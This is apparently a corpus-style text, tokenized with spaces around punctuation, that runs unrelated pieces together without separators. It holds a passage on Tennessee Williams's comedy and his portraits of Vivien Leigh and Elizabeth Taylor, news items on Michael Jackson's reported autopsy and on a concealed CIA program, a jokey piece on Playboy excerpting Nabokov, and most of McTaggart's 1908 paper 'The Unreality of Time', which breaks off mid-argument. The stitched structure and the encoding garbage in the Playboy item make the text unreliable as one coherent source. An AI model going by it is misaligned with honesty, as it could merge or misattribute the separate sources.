I had been briefed to begin with a summary of the plot , and as I described the struggles of the play 's writer - hero , living in a New Orleans apartment - block surrounded by starving gentlefolk , alcoholics and deadbeats , I heard a steadily growing rumble of laughter from across the table .
At first , I thought it was a comment on my inept synopsis .
Gradually , I realised it was the sound of a writer who saw his own remembered tribulations as hilarious .
I recalled that a year earlier he had been asked by the management to leave a performance of The Glass Menagerie at the Shaw theatre in London , because his incessant hilarity at this memory of his own youth was disturbing the rest of the audience .
Williams 's gift for comedy is partly temperamental , and partly a product of a southern inheritance that extends from Mark Twain to Carson McCullers .
It pervades much of his work .
You can see Cat On a Hot Tin Roof as a tragedy about self - delusion , in which the hero , Brick , can no more admit to his homosexuality than his father , Big Daddy , can to his cancer .
But , as Howard Davies 's superb production at the National in 1988 reminded us , the play is also very funny .
It opens with a hilarious monologue by Maggie the Cat , in which she protests against the " no- neck monsters " bred by her endlessly fecund sister - in - law .
Williams could also be ribald and Dionysiac .
In The Rose Tattoo , a devout American - Sicilian widow , Serafina , is aroused from a three - year period of mourning by the arrival of a sexy , muscular buffoon .
The sight of Zoë Wanamaker , in the most recent revival , struggling to get out of her panty - girdle in time to keep an appointment with her lover was hilarious .
At a deeper level , of course , the play is about the force for renewal in human life and the need to break with the past .
Some of Williams 's later work borders on self - parody , but the best of his plays will endure the ravages of time , for a number of reasons : there is his capacity to write great parts for actors , for one thing ; his instinctive love of the marginalised and defeated ; and his fervent opposition to any form of tyranny , whether domestic or political .
As Williams once wrote ( significantly , he used capital letters ) : " to be an Artist is to be a Revolutionary " , whose words are always feared and misunderstood .
It 's time to acknowledge that , inside the complex state of Tennessee , existed a natural rebel .
' As flamboyant as an orchid ' – Williams on his leading ladies
On Vivien Leigh
Leigh is not only the officially appointed first lady of the London theatre , but several other things of equal or greater importance : an actress of great talent which has steadily grown through meeting the challenge of many classic roles , while still appearing so masterfully in such American films as Gone With the Wind and Streetcar .
At present she is appearing in a film based on my novel The Roman Spring of Mrs Stone , a part she accepted despite its being an ageing actress , infatuated with a young adventurer .
Vivien 's beauty is as delicately flamboyant as an orchid .
When she takes the stage , she commands it as if she first arrived there suspended from the bill of a stork .
Vivien is incomparably graceful , she moves like a marvellous dancer , on or off stage , and has an instinct for doing and saying the right thing to put you at ease even when you know you are making a fool of yourself .
All of these wonderful gifts she has given with no apparent regard for her personal vulnerability : in other words she is not only a stunning actress but a lady with the most important part of that intricate composition , which is kindness of heart .
On Elizabeth Taylor
Taylor is one of the great phenomena and symptoms of our time in America .
Everything she has done has been startling and sometimes implausible .
It 's hard to guess what Liz wants out of life : the million - dollar contracts and diamond necklaces or the exercise of what is probably the finest raw talent on the Hollywood screen .
She has a deeply moving response to fellow artists in trouble , and so I 'm inclined to believe she is more interested in the creative work than the loot .
She thoroughly understands the system she is caught in , and she is not to be bossed or intimidated by it .
Hollywood moguls have met their match .
I 've heard her phone conversations with them : mutual understanding and respect .
Naturally I hope that this girl , this cross between a flower and the rock it sprang from , will discover that her greater satisfaction will come from the disciplining of her talent in the stricter conditions of our theatre .
As for Liz 's performance in Suddenly , Last Summer , it demonstrated her ability to rise above miscasting .
She was well cast as Maggie in Cat on a Hot Tin Roof , and should have got her Oscar .
But it stretched my credulity to believe Liz would n't know [ in Suddenly , Last Summer ] that she was " being used for something evil " .
Liz would have dragged Sebastian home by his ears , and so saved them both from considerable embarrassment .
Extracted from Five Fiery Ladies , 1961 , now collected in New Selected Essays : Where I Live ( New Directions )
Michael Jackson was emaciated , bald and riddled with needle wounds when he died , a leaked autopsy reportedly reveals .
A post mortem examination done on Jackson following his death last week found the 1.78 - metre tall pop superstar weighed just 51 kilograms , Britain 's newspaper reported .
The 50 - year - old 's stomach was reportedly empty except for some partially - dissolved pills and his hips , thighs and shoulders were pockmarked with needle wounds - believed to be the legacy of injected narcotic painkillers .
Jackson was also almost completely bald , with just a covering of " peach fuzz " left on his scalp , the pathologist noted in the alleged report .
He died wearing a wig .
The report stated Jackson several broken ribs caused by rescuers pumping his chest to try to resuscitate him after he went into cardiac arrest .
Senator Dianne Feinstein , the chairwoman of the Senate Intelligence Committee , said on Sunday that the Bush administration may have broken the law if the Central Intelligence Agency concealed a covert spy program from Congress .
The New York Times reported on Sunday that the agency ’s current director , Leon E. Panetta , had told the Senate and House intelligence committees that the C.I.A. withheld the information about a secret counterterrorism program on direct orders from then Vice President Dick Cheney .
The Times said that according to two people with direct knowledge of the matter , Panetta ended the program when he first learned of its existence from subordinates on June 23 and briefed the two intelligence committees about it in separate closed sessions the next day .
Ms. Feinstein , a Democrat of California , said on “ Fox News Sunday ” that Mr. Panetta had told senators last month about Mr. Cheney ordering that the program not be disclosed to Congress .
Playboy Gets First Serial Rights to Nabokov 's " The Original of Laura "
Nabokov checkmates his wife , Vera .
She dreams of revenge .
Vladimir Nabokov 's unfinished novel -- the one he instructed his wife to burn but which will now be published by his son in November -- will appear for the first time as an excerpt in the pages of Playboy .
Young Dmitri Nabokov originally wanted the excerpt to appear in the New Yorker , but the New Yorker was n't interested in the young , pert , unfinished piece .
Playboy 's literary editor Amy Grace Loyd sent Andrew Wylie orchids all spring long to remind him that Nabokov 's book " Ada , or Ardor " was first excerpted in Playboy in 1969 , and that there is no shame in a novel appearing unedited ( or " nude " ) in the pages of a salacious men 's magazine .
In fact , if done properly with the right airbrushing and lighting , it could even be tasteful .
Even " artistic .
" From The New York Observer , who broke the story : " There were a few sticking points in the negotiation , chiefly the fact that Mr. Wylie wanted Ms. Loyd to give an offer on the book without first reading a page of it .
But " I knew because of Nabokov 's genius , even if the manuscript was even more messy than it actually is , I would probably still be content , " Ms. Loyd said .
Terms were finalized during the third week of June .
" I 'm happy to tell you we 've never paid this much for a book excerpt before , ever , " Ms. Loyd said , adding : " There are parts of it that are much more cohesive than others .
But I found it fascinating in that way .
" The plan right now is for a 5,000 - word excerpt to run in Playboy 's December issue , which arrives on stands on Nov. 10Ã ¢Â  Â " about a week before Knopf will ship the book to stores .
" I 'm so glad all those orchids did not die in vain , " Ms. Loyd said .
" I do n't imagine anybody 's taking good care of them over there .
" Once upon a time porn magazines had to contain literature in order to sell copies .
Perhaps it is time for literary magazines to consider ... branching out ?
Call us , Mrs. Rowling !
We will be so fucking professional !
The Unreality of Time ( 1908 )
by ( 1908 ) sister projects : Wikipedia article , Wikidata item .
Published in Mind : A Quarterly Review of Psychology and Philosophy 17 ( 1908 ) : 456-473 .
Published in : A Quarterly Review of Psychology and Philosophy 17 ( 1908 ) : 456-473 . 10358 The Unreality of Time John McTaggart Ellis McTaggart 1908
It doubtless seems highly paradoxical to assert that Time is unreal , and that all statements which involve its reality are erroneous .
Such an assertion involves a far greater departure from the natural position of mankind than is involved in the assertion of the unreality of Space or of the unreality of Matter .
So decisive a breach with that natural position is not to be lightly accepted .
And yet in all ages the belief in the unreality of time has proved singularly attractive .
In the philosophy and religion of the East we find that this doctrine is of cardinal importance .
And in the West , where philosophy and religion are less closely connected , we find that the same doctrine continually recurs , both among philosophers and among theologians .
Theology never holds itself apart from mysticism for any long period , and almost all mysticism denies the reality of time .
In philosophy , again , time is treated as unreal by Spinoza , by Kant , by Hegel , and by Schopenhauer .
In the philosophy of the present day the two most important movements ( excluding those which are as yet merely critical ) are those which look to Hegel and to Mr. Bradley .
And both of these schools deny the reality of time .
Such a concurrence of opinion cannot be denied to be highly significant -- and is not the less significant because the doctrine takes such different forms , and is supported by such different arguments .
I believe that time is unreal .
But I do so for reasons which are not , I think , employed by any of the philosophers whom I have mentioned , and I propose to explain my reasons in this paper .
Positions in time , as time appears to us prima facie , are distinguished in two ways .
Each position is Earlier than some , and Later than some , of the other positions .
And each position is either Past , Present , or Future .
The distinctions of the former class are permanent , while those of the latter are not .
If M is ever earlier than N , it is always earlier .
But an event , which is now present , was future and will be past .
Since distinctions of the first class are permanent , they might be held to be more objective , and to be more essential to the nature of time .
I believe , however , that this would be a mistake , and that the distinction of past , present and future is as essential to time as the distinction of earlier and later , while in a certain sense , as we shall see , it may be regarded as more fundamental than the distinction of earlier and later .
And it is because the distinctions of past , present and future seem to me to be essential for time , that I regard time as unreal .
For the sake of brevity I shall speak of the series of positions running from the far past through the near past to the present , and then from the present to the near future and the far future , as the A series .
The series of positions which runs from earlier to later I shall call the B series .
The contents of a position in time are called events .
The contents of a single position are admitted to be properly called a plurality of events .
( I believe , however , that they can as truly , though not more truly , be called a single event .
This view is not universally accepted , and it is not necessary for my argument . )
A position in time is called a moment .
The first question which we must consider is whether it is essential to the reality of time that its events should form an A series as well as a B series .
And it is clear , to begin with , that we never observe time except as forming both these series .
We perceive events in time as being present , and those are the only events which we perceive directly .
And all other events in time which , by memory or inference , we believe to be real , are regarded as past or future -- those earlier than the present being past , and those later than the present being future .
Thus the events of time , as observed by us , form an A series as well as a B series .
It is possible , however , that this is merely subjective .
It may be the case that the distinction introduced among positions in time by the A series -- the distinction of past , present and future -- is simply a constant illusion of our minds , and that the real nature of time only contains the distinction of the B series -- the distinction of earlier and later .
In that case we could not perceive time as it really is , but we might be able to think of it as it really is .
This is not a very common view , but it has found able supporters .
I believe it to be untenable , because , as I said above , it seems to me that the A series is essential to the nature of time , and that any difficulty in the way of regarding the A series as real is equally a difficulty in the way of regarding time as real .
It would , I suppose , be universally admitted that time involves change .
A particular thing , indeed , may exist unchanged through any amount of time .
But when we ask what we mean by saying that there were different moments of time , or a certain duration of time , through which the thing was the same , we find that we mean that it remained the same while other things were changing .
A universe in which nothing whatever changed ( including the thoughts of the conscious beings in it ) would be a timeless universe .
If , then , a B series without an A series can constitute time , change must be possible without an A series .
Let us suppose that the distinction of past , present and future does not apply to reality .
Can change apply to reality ?
What is it that changes ?
Could we say that , in a time which formed a B series but not an A series , the change consisted in the fact that an event ceased to be an event , while another event began to be an event ?
If this were the case , we should certainly have got a change .
But this is impossible .
An event can never cease to be an event .
It can never get out of any time series in which it once is .
If N is ever earlier than O and later than M , it will always be , and has always been , earlier than O and later than M , since the relations of earlier and later are permanent .
And as , by our present hypothesis , time is constituted by a B series alone , N will always have a position in a time series , and has always had one .
{ 1} That is , it will always be , and has always been , an event , and can not begin or cease to be an event .
Or shall we say that one event M merges itself into another event N , while preserving a certain identity by means of an unchanged element , so that we can say , not merely that M has ceased and N begun , but that it is M which has become N? Still the same difficulty recurs .
M and N may have a common element , but they are not the same event , or there would be no change .
If therefore M changes into N at a certain moment , then , at that moment , M has ceased to be M , and N has begun to be N .
But we have seen that no event can cease to be , or begin to be , itself , since it never ceases to have a place as itself in the B series .
Thus one event cannot change into another .
Neither can the change be looked for in the numerically different moments of absolute time , supposing such moments to exist .
For the same arguments will apply here .
Each such moment would have its own place in the B series , since each would be earlier or later than each of the others .
And as the B series indicate permanent relations , no moment could ever cease to be , nor could it become another moment .
Since , therefore , what occurs in time never begins or ceases to be , or to be itself , and since , again , if there is to be change it must be change of what occurs in time ( for the timeless never changes ) , I submit that only one alternative remains .
Changes must happen to the events of such a nature that the occurrence of these changes does not hinder the events from being events , and the same events , both before and after the change .
Now what characteristics of an event are there which can change and yet leave the event the same event ?
( I use the word characteristic as a general term to include both the qualities which the event possesses , and the relations of which it is a term -- or rather the fact that the event is a term of these relations . )
It seems to me that there is only one class of such characteristics -- namely , the determination of the event in question by the terms of the A series .
Take any event -- the death of Queen Anne , for example -- and consider what change can take place in its characteristics .
That it is a death , that it is the death of Anne Stuart , that it has such causes , that it has such effects -- every characteristic of this sort never changes .
" Before the stars saw one another plain " the event in question was a death of an English Queen .
At the last moment of time -- if time has a last moment -- the event in question will still be a death of an English Queen .
And in every respect but one it is equally devoid of change .
But in one respect it does change .
It began by being a future event .
It became every moment an event in the nearer future .
At last it was present .
Then it became past , and will always remain so , though every moment it becomes further and further past .
Thus we seem forced to the conclusion that all change is only a change of the characteristics imparted to events by their presence in the A series , whether those characteristics are qualities or relations .
If these characteristics are qualities , then the events , we must admit , would not be always the same , since an event whose qualities alter is , of course , not completely the same .
And , even if the characteristics are relations , the events would not be completely the same , if -- as I believe to be the case -- the relation of X to Y involves the existence in X of a quality of relationship to Y.{ 2 }
Then there would be two alternatives before us .
We might admit that events did really change their nature , in respect of these characteristics , though not in respect of any others .
I see no difficulty in admitting this .
It would place the determinations of the A series in a very unique position among the characteristics of the event , but on any theory they would be very unique characteristics .
It is usual , for example , to say that a past event never changes , but I do not see why we should not say , instead of this , " a past event changes only in one respect -- that every moment it is further from the present than it was before " .
But although I see no intrinsic difficulty in this view , it is not the alternative I regard as ultimately true .
For if , as I believe , time is unreal , the admission that an event in time would change in respect of its position in the A series would not involve that anything really did change .
Without the A series then , there would be no change , and consequently the B series by itself is not sufficient for time , since time involves change .
The B series , however , cannot exist except as temporal , since earlier and later , which are the distinctions of which it consists , are clearly time - determinations .
So it follows that there can be no B series where there is no A series , since where there is no A series there is no time .
But it does not follow that , if we subtract the determinations of the A series from time , we shall have no series left at all .
There is a series -- a series of the permanent relations to one another of those realities which in time are events -- and it is the combination of this series with the A determinations which gives time .
But this other series -- let us call it the C series -- is not temporal , for it involves no change , but only an order .
Events have an order .
They are , let us say , in the order M , N , O , P .
And they are therefore not in the order M , O , N , P , or O , N , M , P , or in any other possible order .
But that they have this order no more implies that there is any change than the order of the letters of the alphabet , or of the Peers on the Parliament Roll , implies any change .
And thus those realities which appear to us as events might form such a series without being entitled to the name of events , since that name is only given to realities which are in a time series .
It is only when change and time come in that the relations of this C series become relations of earlier and later , and so it becomes a B series .
More is wanted , however , for the genesis of a B series and of time than simply the C series and the fact of change .
For the change must be in a particular direction .
And the C series , while it determines the order , does not determine the direction .
If the C series runs M , N , O , P , then the B series from earlier to later cannot run M , O , N , P , or M , P , O , N , or in any way but two .
But it can run either M , N , O , P ( so that M is earliest and P latest ) or else P , O , N , M ( so that P is earliest and M latest ) .
And there is nothing either in the C series or in the fact of change to determine which it will be .
A series which is not temporal has no direction of its own , though it has an order .
If we keep to the series of the natural numbers , we can not put 17 between 21 and 26 .
But we keep to the series , whether we go from 17 , through 21 , to 26 , or whether we go from 26 , through 21 , to 17 .
The first direction seems the more natural to us , because this series has only one end , and it is generally more convenient to have that end as a beginning than as a termination .
But we equally keep to the series in counting backward .
Again , in the series of categories in Hegel 's dialectic , the series prevents us from putting the Absolute Idea between Being and Causality .
But it permits us either to go from Being , through Causality , to the Absolute Idea , or from the Absolute Idea , through Causality , to Being .
The first is , according to Hegel , the direction of proof , and is thus generally the most convenient order of enumeration .
But if we found it convenient to enumerate in the reverse direction , we should still be observing the series .
A non-temporal series , then , has no direction in itself , though a person considering it may take the terms in one direction or in the other , according to his own convenience .
And in the same way a person who contemplates a time - order may contemplate it in either direction .
I may trace the order of events from the Great Charter to the Reform Bill or from the Reform Bill to the Great Charter .
But in dealing with the time series we have not to do merely with a change in an external contemplation of it , but with a change which belongs to the series itself .
And this change has a direction of its own .
The Great Charter came before the Reform Bill , and the Reform Bill did not come before the Great Charter .
Therefore , besides the C series and the fact of change there must be given -- in order to get time -- the fact that the change is in one direction and not in the other .
We can now see that the A series , together with the C series , is sufficient to give us time .
For in order to get change , and change in a given direction , it is sufficient that one position in the C series should be Present , to the exclusion of all others , and that this characteristic of presentness should pass along the series in such a way that all positions on the one side of the Present have been present , and all positions on the other side of it will be present .
That which has been present is Past , that which will be present is Future .
{ 3 }
Thus to our previous conclusion that there can be no time unless the A series is true of reality , we can add the further conclusion that no other elements are required to constitute a time - series except an A series and a C series .
We may sum up the relations of the three series to time as follows :
The A and B series are equally essential to time , which must be distinguished as past , present and future , and must likewise be distinguished as earlier and later .
But the two series are not equally fundamental .
The distinctions of the A series are ultimate .
We cannot explain what is meant by past , present and future .
We can , to some extent , describe them , but they can not be defined .
We can only show their meaning by examples .
" Your breakfast this morning , " we can say to an inquirer , " is past ; this conversation is present ; your dinner this evening is future . "
We can do no more .
The B series , on the other hand , is not ultimate .
For , given a C series of permanent relations of terms , which is not in itself temporal , and therefore is not a B series , and given the further fact that the terms of this C series also form an A series , and it results that the terms of the C series become a B series , those which are placed first , in the direction from past to future , being earlier than those whose places are further in the direction of the future .
The C series , however , is as ultimate as the A series .
We can not get it out of anything else .
That the units of time do form a series , the relations of which are permanent , is as ultimate as the fact that each of them is present , past , or future .
And this ultimate fact is essential to time .
For it is admitted that it is essential to time that each moment of it shall either be earlier or later than any other moment ; and these relations are permanent .
And this -- the B series -- cannot be got out of the A series alone .
It is only when the A series , which gives change and direction , is combined with the C series , which gives permanence , that the B series can arise .
Only part of the conclusion which I have now reached is required for the general purpose of this paper .
I am endevouring to base the unreality of time , not on the fact that the A series is more fundamental than the B series , but on the fact that it is as essential as the B series -- that the distinctions of past , present and future are essential to time and that , if the distinctions are never true of reality , then no reality is in time .
This view , whether it is true or false , has nothing surprising in it .
It was pointed out above that time , as we perceive it , always presents these distinctions .
And it has generally been held that this is a real characteristic of time , and not an illusion due to the way in which we perceive it .
Most philosophers , whether they did or did not believe time to be true of reality , have regarded the distinctions of the A series as essential to time .
When the opposite view has been maintained , it has generally been , I believe , because it was held ( rightly , as I shall try to show later on ) that the distinctions of present , past and future cannot be true of reality , and that consequently , if the reality of time is to be saved , the distinction in question must be shown to be unessential to time .
The presumption , it was held , was for the reality of time , and this would give us a reason for rejecting the A series as unessential to time .
But of course this could only give a presumption .
If the analysis of the notion of time showed that , by removing the A series , time was destroyed , this line of argument would be no longer open , and the unreality of the A series would involve the unreality of time .
I have endeavoured to show that the removal of the A series does destroy time .
But there are two objections to this theory , which we must now consider .
The first deals with those time - series which are not really existent , but which are falsely believed to be existent , or which are imagined as existent .
Take , for example , the adventures of Don Quixote .
This series , it is said , is not an A series .
I can not at this moment judge it to be either past , present or future .
Indeed I know that it is none of the three .
Yet , it is said , it is certainly a B series .
The adventure of the galley - slaves , for example , is later than the adventure of the windmills .
And a B series involves time .
The conclusion drawn is that an A series is not essential to time .
The answer to this objection I hold to be as follows .
Time only belongs to the existent .
If any reality is in time , that involves that the reality in question exists .
This , I imagine , would be universally admitted .
It may be questioned whether all of what exists is in time , or even whether anything really existent is in time , but it would not be denied that , if anything is in time , it must exist .
Now what is existent in the adventures of Don Quixote ?
Nothing .
For the story is imaginary .
The acts of Cervantes ' mind when he invented the story , the acts of my mind when I think of the story -- these exist .
But then these form part of an A series .
Cervantes ' invention of the story is in the past .
My thought of the story is in the past , the present , and -- I trust -- the future .
But the adventures of Don Quixote may be believed by a child to be historical .
And in reading them I may by an effort of the imagination contemplate them as if they really happened .
In this case , the adventures are believed to be existent or imagined as existent .
But then they are believed to be in the A series , or imagined as in the A series .
The child who believes them historical will believe that they happened in the past .
If I imagine them as existent , I shall imagine them as happening in the past .
In the same way , if any one believed the events recorded in Morris 's News from Nowhere to exist , or imagined them as existent , he would believe them to exist in the future or imagine them as existent in the future .
Whether we place the object of our belief or our imagination in the present , the past , or the future , will depend upon the characteristics of that object .
But somewhere in our A series it will be placed .
Thus the answer to the objection is that , just as a thing is in time , it is in the A series .
If it is really in time , it is really in the A series .
If it is believed to be in time , it is believed to be in the A series .
If it is imagined as in times it is imagined as in the A series .
The second objection is based on the possibility , discussed by Mr. Bradley , that there might be several independent time - series in reality .
For Mr. Bradley , indeed , time is only appearance .
There is no real time at all , and therefore there are not several real series of time .
But the hypothesis here is that there should be within reality several real and independent time - series .
The objection , I imagine , is that the time - series would be all real , while the distinction of past , present , and future would only have meaning within each series , and could not , therefore , be taken as ultimately real .
There would be , for example , many presents .
Now , of course , many points of time can be present ( each point in each time - series is a present once ) , but they must be present successively .
And the presents of the different time - series would not be successive , since they are not in the same time .
( Neither would they be simultaneous , since that equally involves being in the same time .
They would have no time - relation whatever . )
And different presents , unless they are successive , cannot be real .
So the different time - series , which are real , must be able to exist independently of the distinction between past , present , and future .
I cannot , however , regard this objection as valid .
No doubt , in such a case , no present would be the present -- it would only be the present of a certain aspect of the universe .
But then no time would be the time -- it would only be the time of a certain aspect of the universe .
It would , no doubt , be a real time - series , but I do not see that the present would be less real than the time .
I am not , of course , asserting that there is no contradiction in the existence of several distinct A series .
My main thesis is that the existence of any A series involves a contradiction .
What I assert here is merely that , supposing that there could be any A series , I see no extra difficulty involved in there being several such series independent of one another , and that therefore there is no incompatibility between the essentiality of an A series for time and the existence of several distinct times .
Moreover , we must remember that the theory of a plurality of time series is a mere hypothesis .
No reason has ever been given why we should believe in their existence .
It has only been said that there is no reason why we should disbelieve in their existence , and that therefore they may exist .
But if their existence should be incompatible with something else , for which there is positive evidence , then there would be a reason why we should disbelieve in their existence .
Now there is , as I have tried to show , positive evidence for believing that an A series is essential to time .
Supposing therefore that it were the case ( which , for the reasons given above , I deny ) that the existence of a plurality of time - series was incompatible with the essentiality for time of the A series , it would be the hypothesis of a plurality of times which should be rejected , and not our conclusion as to the A series .
I now pass to the second part of my task .
Having , as it seems to me , succeeded in proving that there can be no time without an A series , it remains to prove that an A series cannot exist , and that therefore time cannot exist .
This would involve that time is not real at all , since it is admitted that , the only way in which time can be real is by existing .
The terms of the A series are characteristics of events .
We say of events that they are either past , present , or future .
If moments of time are taken as separate realities , we say of them also that they are past , present , or future .
A characteristic may be either a relation or a quality .
Whether we take the terms of the A series as relations of events ( which seems the more reasonable view ) or whether we take them as qualities of events , it seems to me that they involve a contradiction .
Let us first examine the supposition that they are relations .
In that case only one term of each relation can be an event or a moment .
The other term must be something outside the time - series .
{ 4 } For the relations of the A series are changing relations , and the relation of terms of the time - series to one another do not change .
Two events are exactly in the same places in the time - series , relatively to one another , a million years before they take place , while each of them is taking place , and when they are a million years in the past .
The same is true of the relation of moments to each other .
Again , if the moments of time are to be distinguished as separate realities from the events which happen in them , the relation between an event and a moment is unvarying .
Each event is in the same moment in the future , in the present , and in the past .
The relations which form the A series then must be relations of events and moments to something not itself in the time - series .
What this something is might be difficult to say .
But , waiving this point , a more positive difficulty presents itself .
Past , present , and future are incompatible determinations .
Every event must be one or the other , but no event can be more than one .
This is essential to the meaning of the terms .
And , if it were not so , the A series would be insufficient to give us , in combination with the C series , the result of time .
For time , as we have seen , involves change , and the only change we can get is from future to present , and from present to past .
The characteristics , therefore , are incompatible .
But every event has them all .
If M is past , it has been present and future .
If it is future , it will be present and past .
If it is present , it has been future and will be past .
Thus all the three incompatible terms are predicable of each event which is obviously inconsistent with their being incompatible , and inconsistent with their producing change .
It may seem that this can easily be explained .
Indeed it has been impossible to state the difficulty without almost giving the explanation , since our language has verb - forms for the past , present , and future , but no form that is common to all three .
It is never true , the answer will run , that M is present , past and future .
It is present , will be past , and has been future .
Or it is past , and has been future and present , or again is future and will be present and past .
The characteristics are only incompatible when they are simultaneous , and there is no contradiction to this in the fact that each term has all of them successively .
But this explanation involves a vicious circle .
For it assumes the existence of time in order to account for the way in which moments are past , present and future .
Time then must be pre-supposed to account for the A series .
But we have already seen that the A series has to be assumed in order to account for time .
Accordingly the A series has to be pre-supposed in order to account for the A series .
And this is clearly a vicious circle .
What we have done is this -- to meet the difficulty that my writing of this article has the characteristics of past , present and future , we say that it is present , has been future , and will be past .
But " has been " is only distinguished from " is " by being existence in the past and not in the present , and " will be " is only distinguished from both by being existence in the future .
Thus our statement comes to this -- that the event in question is present in the present , future in the past , past in the future .
And it is clear that there is a vicious circle if we endeavour to assign the characteristics of present , future and past by the criterion of the characteristics of present , past and future .
The difficulty may be put in another way , in which the fallacy will exhibit itself rather as a vicious infinite series than as a vicious circle .
If we avoid the incompatibility of the three characteristics by asserting that M is present , has been future , and will be past , we are constructing a second A series , within which the first falls , in the same way in which events fall within the first .
It may be doubted whether any intelligible meaning can be given to the assertion that time is in time .
But , in any case , the second A series will suffer from the same difficulty as the first , which can only be removed by placing it inside a third A series .
The same principle will place the third inside a fourth , and so on without end .
You can never get rid of the contradiction , for , by the act of removing it from what is to be explained , you produce it over again in the explanation .
And so the explanation is invalid .
Thus a contradiction arises if the A series is asserted of reality when the A series is taken as a series of relations .
Could it be taken as a series of qualities , and would this give us a better result ?
Are there three qualities -- futurity , presentness , and pastness , and are events continually changing the first for the second , and the second for the third ?
It seems to me that there is very little to be said for the view that the changes of the A series are changes of qualities .
No doubt my anticipation of an experience M , the experience itself , and the memory of the experience are three states which have different qualities .
But it is not the future M , the present M , and the past M , which have these three different qualities .
The qualities are possessed by three distinct events -- the anticipation of M , the experience M itself , and the memory of M , each of which is in turn future , present , and past .
Thus this gives no support to the view that the changes of the A series are changes of qualities .
But we need not go further into this question .
If the characteristics of the A series were qualities , the same difficulty would arise as if they were relations .
For , as before , they are not compatible , and , as before , every event has all of them .
This can only be explained , as before , by saying that each event has them successively .
And thus the same fallacy would have been committed as in the previous case .
{5}
We have come then to the conclusion that the application of the A series to reality involves a contradiction , and that consequently the A series can not be true of reality .
And , since time involves the A series , it follows that time can not be true of reality .
Whenever we judge anything to exist in time , we are in error .
And whenever we perceive anything as existing in time -- which is the only way in which we ever do perceive things -- we are perceiving it more or less as it really is not .
We must consider a possible objection .
Our ground for rejecting time , it may be said , is that time cannot be explained without assuming time .
But may this not prove -- not that time is invalid , but rather that time is ultimate ?
It is impossible to explain , for example , goodness or truth unless by bringing in the term to be explained as part of the explanation , and we therefore reject the explanation as invalid .
But we do not therefore reject the notion as erroneous , but accept it as something ultimate , which , while it does not admit of explanation , does not require it .
But this does not apply here .
An idea may be valid of reality though it does not admit of a valid explanation .
But it can not be valid of reality if its application to reality involves a contradiction .
Now we began by pointing out that there was such a contradiction in the case of time -- that the characteristics of the A series are mutually incompatible and yet all true of every term .
Unless this contradiction is removed , the idea of time must be rejected as invalid .
It was to remove this contradiction that the explanation was suggested that the characteristics belong to the terms successively .
When this explanation failed as being circular , the contradiction remained unremoved , and the idea of time must be rejected , not because it cannot be explained , but because the contradiction cannot be removed .
What has been said already , if valid , is an adequate ground for rejecting time .
But we may add another consideration .
Time , as we have seen , stands and falls with the A series .
Now , even if we ignore the contradiction which we have just discovered in the application of the A series to reality , was there ever any positive reason why we should suppose that the A series was valid of reality ?
Why do we believe that events are to be distinguished as past , present and future ?
I conceive that the belief arises from distinctions in our own experience .
At any moment I have certain perceptions , I have also the memory of certain other perceptions , and the anticipation of others again .
The direct perception itself is a mental state qualitatively different from the memory or the anticipation of perceptions .
On this is based the belief that the perception itself has a certain characteristic when I have it , which is replaced by other characteristics when I have the memory or the anticipation of it -- which characteristics are called presentness , pastness , and futurity .
Having got the idea of these characteristics we apply them to other events .
Everything simultaneous with the direct perception which I have now is called present , and it is even held that there would be a present if no one had a direct perception at all .
In the same way acts simultaneous with remembered perceptions or anticipated perceptions are held to be past or future , and this again is extended to events to which none of the perceptions I now remember or anticipate are simultaneous .
But the origin of our belief in the whole distinction lies in the distinction between perceptions and anticipations or memories of perceptions .
A direct perception is present when I have it , and so is what is simultaneous with it .
In the first place this definition involves a circle , for the words " when I have it , " can only mean " when it is present " .
But if we left out these words , the definition would be false , for I have many direct presentations which are at different times , and which cannot , therefore , all be present , except successively .
This , however , is the fundamental contradiction of the A series , which has been already considered .
The point I wish to consider here is different .
The direct perceptions which I now have are those which now fall within my " specious present " .
Of those which are beyond it , I can only have memory or anticipation .
Now the " specious present " varies in length according to circumstances , and may be different for two people at the same period .
The event M may be simultaneous both with X's perception Q and Y's perception R .
At a certain moment Q may have ceased to be part of X's specious present .
M , therefore , will at that moment be past .
But at the same moment R may still be part of Y's specious present .
And , therefore , M will be present , at the same moment at which it is past .
This is impossible .
If , indeed , the A series was something purely subjective , there would be no difficulty .
We could say that M was past for X and present for Y , just as we could say that it was pleasant for X and painful for Y .
But we are considering attempts to take time as real , as something which belongs to the reality itself , and not only to our beliefs about it , and this can only be so if the A series also applies to the reality itself .
And if it does this , then at any moment M must be present or past .
It can not be both .
The present through which events really pass , therefore , cannot be determined as simultaneous with the specious present .
It must have a duration fixed as an ultimate fact .
This duration cannot be the same as the duration of all specious presents , since all specious presents have not the same duration .
And thus an event may be past when I am experiencing it as present , or present when I am experiencing it as past .
The duration of the objective present may be the thousandth part of a second .
Or it may be a century , and the accessions of George IV . and Edward VII .
may form part of the same present .
What reason can we have to believe in the existence of such a present , which we certainly do not observe to be a present , and which has no relation to what we do observe to be a present ?
If we escape front these difficulties by taking the view , which has sometimes been held , that the present in the A series is not a finite duration , but a mere point , separating future from past , we shall find other difficulties as serious .
For then the objective time in which events are will be something utterly different from the time in which we perceive them .
The time in which we perceive them has a present of varying finite duration , and , therefore , with the future and the past , is divided into three durations .
The objective time has only two durations , separated by a present which has nothing but the name in common with the present of experience , since it is not a duration but a point .
What is there in our experience which gives us the least reason to believe in such a time as this ?
And so it would seem that the denial of the reality of time is not so very paradoxical after all .
It was called paradoxical because it seemed to contradict our experience so violently -- to compel us to treat so much as illusion which appears prima facie to give knowledge of reality .
But we now see that our experience of time -- centring as it does about the specious present -- would be no less illusory if there were a real time in which the realities we experience existed .
The specious present of our observations -- varying as it does from you to me -- cannot correspond to the present of the events observed .
And consequently the past and future of our observations could not correspond to the past and future of the events observed .
On either hypothesis -- whether we take time as real or as unreal -- everything is observed in a specious present , but nothing , not even the observations themselves , can ever be in a specious present .
And in that case I do not see that we treat experience as much more illusory when we say that nothing is ever in a present at all , than when we say that everything passes through some entirely different present .
Our conclusion , then , is that neither time as a whole , nor the A series and B series , really exist .
But this leaves it possible that the C series does really exist .
The A series was rejected for its inconsistency .
And its rejection involved the rejection of the B series .
But we have found no such contradiction in the C series , and its invalidity does not follow from the invalidity of the A series .
It is , therefore , possible that the realities which we perceive as events in a time - series do really form a non-temporal series .
It is also possible , so far as we have yet gone , that they do not form such a series , and that they are in reality no more a series than they are temporal .
But I think -- though I have no room to go into the question here -- that the former view , according to which they really do form a C series , is the more probable .
Should it be true , it will follow that in our perception of these realities as events in time , there will be some truth as well as some error .
Through the deceptive form of time , we shall grasp some of their true relations .
If we say that the events M and N are simultaneous , we say that they occupy the same position in the time - series .
